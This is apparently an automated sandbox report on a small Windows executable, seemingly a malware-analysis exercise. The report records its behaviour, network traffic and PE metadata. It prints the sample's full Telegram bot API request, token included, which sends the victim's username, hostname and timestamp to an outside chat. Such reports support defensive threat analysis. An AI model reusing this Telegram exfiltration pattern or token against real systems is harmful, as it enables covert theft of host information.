Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8v1GZ8v1LF.exe

Overview

General Information

Sample name:8v1GZ8v1LF.exe
renamed because original name is a hash value
Original sample name:0ebecd9783b94a5a634ff71b100e337f.exe
Analysis ID:1579253
MD5:0ebecd9783b94a5a634ff71b100e337f
SHA1:4d5e68b1ebd60830607425bdd698e52e279d56a2
SHA256:b7f579a0c8dcf3d9f8a98e1ba5d8579f545c69868fecaaba6faba8579143a4b1
Tags:exeuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • 8v1GZ8v1LF.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\8v1GZ8v1LF.exe" MD5: 0EBECD9783B94A5A634FF71B100E337F)
    • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-21T08:41:05.137204+010020283713Unknown Traffic192.168.2.649707149.154.167.220443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 8v1GZ8v1LF.exeVirustotal: Detection: 12%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.9% probability
Source: 8v1GZ8v1LF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: 8v1GZ8v1LF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\MALDEV01\Source\Repos\Flipflop7\CDCA-Sim1\Release\Analysis_Exercise_2.pdb source: 8v1GZ8v1LF.exe
Source: Binary string: C:\Users\MALDEV01\Source\Repos\Flipflop7\CDCA-Sim1\Release\Analysis_Exercise_2.pdb source: 8v1GZ8v1LF.exe

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 149.154.167.220:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=257842114&text=Username:%20user%0AHostname:%20855271%0ATimestamp:%202024-12-21%2002:41:02 HTTP/1.1Connection: Keep-AliveUser-Agent: A Telegram Bot Client/1.0Host: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: 8v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
Source: 8v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=25784
Source: 8v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org:443/bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=2
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: 8v1GZ8v1LF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.troj.winEXE@2/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
Source: 8v1GZ8v1LF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 8v1GZ8v1LF.exeVirustotal: Detection: 12%
Source: unknownProcess created: C:\Users\user\Desktop\8v1GZ8v1LF.exe "C:\Users\user\Desktop\8v1GZ8v1LF.exe"
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeSection loaded: dpapi.dllJump to behavior
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 8v1GZ8v1LF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 8v1GZ8v1LF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\MALDEV01\Source\Repos\Flipflop7\CDCA-Sim1\Release\Analysis_Exercise_2.pdb source: 8v1GZ8v1LF.exe
Source: Binary string: C:\Users\MALDEV01\Source\Repos\Flipflop7\CDCA-Sim1\Release\Analysis_Exercise_2.pdb source: 8v1GZ8v1LF.exe
Source: 8v1GZ8v1LF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8v1GZ8v1LF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8v1GZ8v1LF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8v1GZ8v1LF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8v1GZ8v1LF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: 8v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 8v1GZ8v1LF.exe, 00000000.00000002.2156305182.00000000004FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D1947 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006D1947
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D1947 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006D1947
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D14C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006D14C1
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D1AA9 SetUnhandledExceptionFilter,0_2_006D1AA9
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D1BE4 cpuid 0_2_006D1BE4
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D1834 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006D1834
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeCode function: 0_2_006D1080 GetUserNameA,GetComputerNameA,_time64,_localtime64_s,strftime,WinHttpOpen,WinHttpConnect,WinHttpCloseHandle,WinHttpOpenRequest,WinHttpCloseHandle,WinHttpCloseHandle,WinHttpCloseHandle,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpCloseHandle,WinHttpCloseHandle,WinHttpCloseHandle,WinHttpCloseHandle,0_2_006D1080
Source: C:\Users\user\Desktop\8v1GZ8v1LF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Process Injection
OS Credential Dumping1
System Time Discovery
Remote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
System Owner/User Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
System Information Discovery
SSHKeylogging1
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
8v1GZ8v1LF.exe3%ReversingLabs
8v1GZ8v1LF.exe13%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
api.telegram.org
149.154.167.220
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://api.telegram.org/bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=257842114&text=Username:%20user%0AHostname:%20855271%0ATimestamp:%202024-12-21%2002:41:02false
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.telegram.org/bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=257848v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000528000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://api.telegram.org/8v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://api.telegram.org:443/bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=28v1GZ8v1LF.exe, 00000000.00000002.2156305182.0000000000528000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            149.154.167.220
            api.telegram.orgUnited Kingdom
            62041TELEGRAMRUfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1579253
            Start date and time:2024-12-21 08:40:09 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 2m 0s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:3
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:8v1GZ8v1LF.exe
            renamed because original name is a hash value
            Original Sample Name:0ebecd9783b94a5a634ff71b100e337f.exe
            Detection:MAL
            Classification:mal56.troj.winEXE@2/0@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 2
            • Number of non-executed functions: 5
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): dllhost.exe
            • Excluded IPs from analysis (whitelisted): 13.107.246.63
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            149.154.167.220HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
              file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                  Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                      9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                        9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                api.telegram.orgHX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                • 149.154.167.220
                                2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                • 149.154.167.220
                                Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 149.154.167.220
                                c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                • 149.154.167.220
                                PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                • 149.154.167.220
                                66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                • 149.154.167.220
                                _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 149.154.167.220
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                • 149.154.167.99
                                HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                • 149.154.167.99
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                • 149.154.167.99
                                file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                • 149.154.167.220
                                2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                • 149.154.167.220
                                https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                • 149.154.167.99
                                Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 149.154.167.220
                                ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                • 149.154.167.99
                                pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                • 149.154.167.99
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                • 149.154.167.220
                                Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                • 149.154.167.220
                                Loader.exeGet hashmaliciousLummaCBrowse
                                • 149.154.167.220
                                hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                • 149.154.167.220
                                gf3yK6i4OX.exeGet hashmaliciousLummaCBrowse
                                • 149.154.167.220
                                0WO49yZcDA.exeGet hashmaliciousLummaCBrowse
                                • 149.154.167.220
                                No context
                                No created / dropped files found
                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                Entropy (8bit):5.270390470229153
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:8v1GZ8v1LF.exe
                                File size:10'752 bytes
                                MD5:0ebecd9783b94a5a634ff71b100e337f
                                SHA1:4d5e68b1ebd60830607425bdd698e52e279d56a2
                                SHA256:b7f579a0c8dcf3d9f8a98e1ba5d8579f545c69868fecaaba6faba8579143a4b1
                                SHA512:2473ebc4d973dcc8c766f225b008a9bfaf7f0a207a8456776597cf3a10b7ebdedfac1ed7f2628160ae13373c4fbb4d1996235c9665b700faaf7538fcd616dd6e
                                SSDEEP:192:eN70E+jvhoPWJbjjONZl51zvm3e7E5pz6WbH:eN71OvCeJXjAz51vmO7I
                                TLSH:B6224B03F7A60961DB2C87B46133AAB7C47AB7316B5663A3F77758848BB9144D02104F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Sl..Sl..Sl..Z.&._l......Ql......@l......_l......Rl......Tl..Sl..il..J...Rl..J.J.Rl..J...Rl..RichSl.........................
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x4014b7
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows cui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671EA0AB [Sun Oct 27 20:20:59 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:7300507b1775697b1b6ece1accccffcb
                                Instruction
                                call 00007FD57C667CFAh
                                jmp 00007FD57C6677A9h
                                push ebp
                                mov ebp, esp
                                push 00000000h
                                call dword ptr [00402030h]
                                push dword ptr [ebp+08h]
                                call dword ptr [00402034h]
                                push C0000409h
                                call dword ptr [0040202Ch]
                                push eax
                                call dword ptr [00402028h]
                                pop ebp
                                ret
                                push ebp
                                mov ebp, esp
                                sub esp, 00000324h
                                push 00000017h
                                call dword ptr [00402024h]
                                test eax, eax
                                je 00007FD57C667937h
                                push 00000002h
                                pop ecx
                                int 29h
                                mov dword ptr [00403118h], eax
                                mov dword ptr [00403114h], ecx
                                mov dword ptr [00403110h], edx
                                mov dword ptr [0040310Ch], ebx
                                mov dword ptr [00403108h], esi
                                mov dword ptr [00403104h], edi
                                mov word ptr [00403130h], ss
                                mov word ptr [00403124h], cs
                                mov word ptr [00403100h], ds
                                mov word ptr [004030FCh], es
                                mov word ptr [004030F8h], fs
                                mov word ptr [004030F4h], gs
                                pushfd
                                pop dword ptr [00403128h]
                                mov eax, dword ptr [ebp+00h]
                                mov dword ptr [0040311Ch], eax
                                mov eax, dword ptr [ebp+04h]
                                mov dword ptr [00403120h], eax
                                lea eax, dword ptr [ebp+08h]
                                mov dword ptr [0040312Ch], eax
                                mov eax, dword ptr [ebp-00000324h]
                                mov dword ptr [00403068h], 00010001h
                                Programming Language:
                                • [IMP] VS2008 SP1 build 30729
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x275c0xdc.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1e0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x184.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x23200x70.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22600x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000xfc.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xee40x1000407e30ef9ce1c29568e3b8a313abc93fFalse0.617431640625COM executable for DOS6.000419639064174IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x20000xe660x1000965aa6bbe49cf9d6b3c86664b1c0dde7False0.410888671875data4.418955671001766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x30000x3880x200550b6d19eefd3a6f89a89a9be78fdbafFalse0.0546875data0.2804011676589459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x40000x1e00x2008d096de51d16180d98ba04bad2632f19False0.525390625data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x50000x1840x20068ba3eda32685b27479164d7f6ed7d12False0.77734375data5.306861822634445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x40600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                DLLImport
                                KERNEL32.dllGetComputerNameA, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW
                                ADVAPI32.dllGetUserNameA
                                WINHTTP.dllWinHttpReceiveResponse, WinHttpSendRequest, WinHttpCloseHandle, WinHttpConnect, WinHttpOpenRequest, WinHttpOpen
                                VCRUNTIME140.dllmemset, __current_exception, _except_handler4_common, __current_exception_context
                                api-ms-win-crt-time-l1-1-0.dll_time64, strftime, _localtime64_s
                                api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode, __stdio_common_vswprintf, __stdio_common_vsprintf
                                api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _register_thread_local_exe_atexit_callback, _cexit, _initialize_narrow_environment, _set_app_type, _seh_filter_exe, _register_onexit_function, _crt_atexit, _controlfp_s, terminate, exit, _configure_narrow_argv, __p___argc, _exit, _initterm, _initialize_onexit_table, _initterm_e, _c_exit, __p___argv
                                api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                api-ms-win-crt-heap-l1-1-0.dll_set_new_mode
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-12-21T08:41:05.137204+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707149.154.167.220443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 21, 2024 08:41:03.752295971 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:03.752341032 CET44349707149.154.167.220192.168.2.6
